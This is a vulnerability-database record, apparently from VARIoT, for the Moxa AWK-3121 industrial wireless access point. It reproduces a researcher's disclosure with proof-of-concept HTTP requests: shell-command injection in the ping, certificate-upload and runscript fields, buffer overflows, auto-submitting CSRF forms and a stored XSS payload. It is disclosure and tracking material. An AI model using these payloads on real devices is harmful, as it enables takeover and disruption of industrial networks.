\n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n \n2. \n It is intended that an administrator can download /systemlog.log (the system\n log). \n \n ------------------------------------------\n \n [Additional Information]\n POC \n http://192.168.127.253//systemlog.log\n \n ------------------------------------------\n \n [Vulnerability Type]\n Incorrect Access Control\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can navigate to URL and download the systemlog file without any authentication or authorization\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n3. \n The session cookie \"Password508\" does not have an HttpOnly flag. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Missing HttpOnly flag on session cookie\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can use cross-site scripting attack to access the session cookie \"Password508\" which can allow an attacker to login into the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n4. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0\n \n srvName=AAAAAA (etc.) EEEEEE\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n5. \n The device provides a Wi-Fi connection that is open and does not use\n any encryption mechanism by default. An administrator who uses the\n open wireless connection to set up the device can allow an\n attacker to sniff the traffic passing between the user\u0027s computer and the\n device. This can allow an attacker to steal the credentials passing\n over the HTTP connection as well as TELNET traffic. Also an attacker\n can MITM the response and infect a user\u0027s computer very easily as\n well. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Open WiFi Connection\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Device\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can monitor the Wifi channels using Kismet or some other\n opensource software and an wireless card in monitor mode and sniff all\n the traffic including HTTP traffic as well as SSH and Telnet traffic. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n6. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_SendTestEmail HTTP/1.1\n Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f\n \n server=server.mail.com\u0026username=test\u0026password=test\u0026from=test@mail.com\u0026to1=AAAAAAAAAA (etc.)\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n7. \n The device provides a web interface to allow an administrator to\n manage the device. \n \n ------------------------------------------\n \n [Additional Information]\n POC to change name of the device \n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK-ROMEO\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/webSetMainRestart\" method=\"GET\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"SaveValue\" value=\"1\" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Request Forgery (CSRF)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can trick an administrator of the device to visit an\n attacker controlled page while connected to the network and thus trick\n to change the password or any other setting\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n8. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333\n \n srvName=192.168.127.102;ping -c 8 192.168.127.101;##\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in Ping functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n9. \n The device enables an unencrypted TELNET service by default. This allows an\n attacker who has been able to gain an MITM position to easily sniff the\n traffic between the device and the user. Also an attacker can easily\n connect to the TELNET daemon using the default credentials if they have\n not been changed by the user. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Insecure service Telnet enabled by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Telnet daemon\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n10. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_certUpload HTTP/1.1\n Cookie: Password508=68abf30ef8176a4248320929e04df562\n \n ... 114782935826962\n Content-Disposition: form-data; name=\"iw_privatePass\"\n \n ;`ping -c 9 192.168.127.103` ##\n ... 114782935826962\n Content-Disposition: form-data; name=\"bkpath\"\n \n /wireless_cert.asp?index=1\n ... 114782935826962\n Content-Disposition: form-data; name=\"certSection\"\n \n certWlan\n ... 114782935826962\n Content-Disposition: form-data; name=\"rfindex\"\n \n 0\n ... 114782935826962\n Content-Disposition: form-data; name=\"Submit\"\n \n Submit\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile1\"\n \n test.txt\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile\"; filename=\"blob\"\n Content-Type: text/xml\n \n \u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\n ... 114782935826962--\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in file upload\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n11. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK\u003c\\/td\u0027);alert(1);//\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Scripting (XSS)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.9\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n12. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=071b1093656adca3510d5e32f69737ec\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n `ping -c 3 192.168.127.101`\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n13. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n \u003chtml\n \u003cbody\n \u003cscript\n function submitRequest()\n {\n var formData = new FormData();\n \n formData.append(\"iw_filename\", \";`ping -c 9 192.168.127.103` ##\");\n formData.append(\"iw_storage\", \"tftp\");\n formData.append(\"iw_serverip\", \"192.168.1.101\");\n formData.append(\"bkpath\", \"/wireless_cert.asp?index=1\");\n \n // HTML file input, chosen by user\n formData.append(\"certFile1\", \"test.txt\");\n \n // JavaScript file-like object\n var content = \u0027\u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\u0027; // the body of the new file... \n var blob = new Blob([content], { type: \"text/xml\"});\n \n formData.append(\"certFile\", blob);\n \n var request = new XMLHttpRequest();\n request.open(\"POST\", \"http://192.168.127.253/forms/web_certUpload\");\n request.send(formData);\n }\n \u003c/script\n \u003cform action=\"#\"\n \u003cinput type=\"submit\" value=\"Submit request\" onclick=\"submitRequest();\" /\n \u003c/form\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in web runscript functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n14. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"XXXX\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n AAAAAAAAAAAAAAAAAA (etc.)\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10693"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015588"
},
{
"db": "VULHUB",
"id": "VHN-120478"
},
{
"db": "VULMON",
"id": "CVE-2018-10693"
},
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-10693",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "153223",
"trust": 1.9
},
{
"db": "ICS CERT",
"id": "ICSA-19-337-02",
"trust": 1.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015588",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201906-321",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2019.4544",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-120478",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-10693",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120478"
},
{
"db": "VULMON",
"id": "CVE-2018-10693"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015588"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10693"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-321"
}
]
},
"id": "VAR-201906-0783",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-120478"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:00:03.955000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AWK-3121 Series",
"trust": 0.8,
"url": "https://www.moxa.com/en/products/phased-out-products/awk-3121-series"
},
{
"title": "Moxa_AWK_1121",
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-10693"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015588"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120478"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015588"
},
{
"db": "NVD",
"id": "CVE-2018-10693"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://github.com/samuelhuntley/moxa_awk_1121/blob/master/moxa_awk_1121"
},
{
"trust": 1.8,
"url": "https://seclists.org/bugtraq/2019/jun/8"
},
{
"trust": 1.8,
"url": "http://packetstormsecurity.com/files/153223/moxa-awk-3121-1.14-information-disclosure-command-execution.html"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10693"
},
{
"trust": 1.4,
"url": "https://www.us-cert.gov/ics/advisories/icsa-19-337-02"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10693"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4544/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10702"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10699"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10701"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10698"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10695"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/websetmainrestart\""
},
{
"trust": 0.1,
"url": "https://www.moxa.com/event/tech/2008/awk-3121/index.htm"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10696"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10703"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10690"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/iw_websetparameters\""
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/web_certupload\");"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10694"
},
{
"trust": 0.1,
"url": "http://192.168.127.253//systemlog.log"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10691"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10697"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10700"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10692"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120478"
},
{
"db": "VULMON",
"id": "CVE-2018-10693"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015588"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10693"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-321"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-120478"
},
{
"db": "VULMON",
"id": "CVE-2018-10693"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015588"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10693"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-321"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-07T00:00:00",
"db": "VULHUB",
"id": "VHN-120478"
},
{
"date": "2019-06-07T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10693"
},
{
"date": "2019-06-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015588"
},
{
"date": "2019-06-07T22:22:22",
"db": "PACKETSTORM",
"id": "153223"
},
{
"date": "2019-06-07T20:29:00.373000",
"db": "NVD",
"id": "CVE-2018-10693"
},
{
"date": "2019-06-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-321"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-10T00:00:00",
"db": "VULHUB",
"id": "VHN-120478"
},
{
"date": "2019-06-10T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10693"
},
{
"date": "2019-12-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015588"
},
{
"date": "2019-06-10T23:29:01.840000",
"db": "NVD",
"id": "CVE-2018-10693"
},
{
"date": "2019-12-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-321"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-321"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa AWK-3121 Device buffer error vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015588"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-321"
}
],
"trust": 0.6
}
}
VAR-201906-0787
Vulnerability from variot - Updated: 2023-12-18 12:00An issue was discovered on Moxa AWK-3121 1.14 devices. The Moxa AWK 3121 provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "srvName" is susceptible to this injection. By crafting a packet that contains shell metacharacters, it is possible for an attacker to execute the attack. Moxa AWK-3121 The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. This vulnerability stems from the fact that the network system or product does not correctly filter special elements in the process of constructing executable commands from external input data. The device by default allows HTTP traffic thus providing an insecure communication mechanism for a user connecting to the web server. This allows an attacker to sniff the traffic easily and allows an attacker to compromise sensitive data such as credentials.
[VulnerabilityType Other] HTTP traffic by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It is intended that an administrator can download /systemlog.log (the system log).
[Additional Information] POC http://192.168.127.253//systemlog.log
[Vulnerability Type] Incorrect Access Control
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can navigate to URL and download the systemlog file without any authentication or authorization
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The session cookie "Password508" does not have an HttpOnly flag.
[VulnerabilityType Other] Missing HttpOnly flag on session cookie
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can use cross-site scripting attack to access the session cookie "Password508" which can allow an attacker to login into the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0
srvName=AAAAAA (etc.) EEEEEE&option=0&bkpath=%2Fping_trace.asp
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device provides a Wi-Fi connection that is open and does not use any encryption mechanism by default. An administrator who uses the open wireless connection to set up the device can allow an attacker to sniff the traffic passing between the user's computer and the device. This can allow an attacker to steal the credentials passing over the HTTP connection as well as TELNET traffic. Also an attacker can MITM the response and infect a user's computer very easily as well.
[VulnerabilityType Other] Open WiFi Connection
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
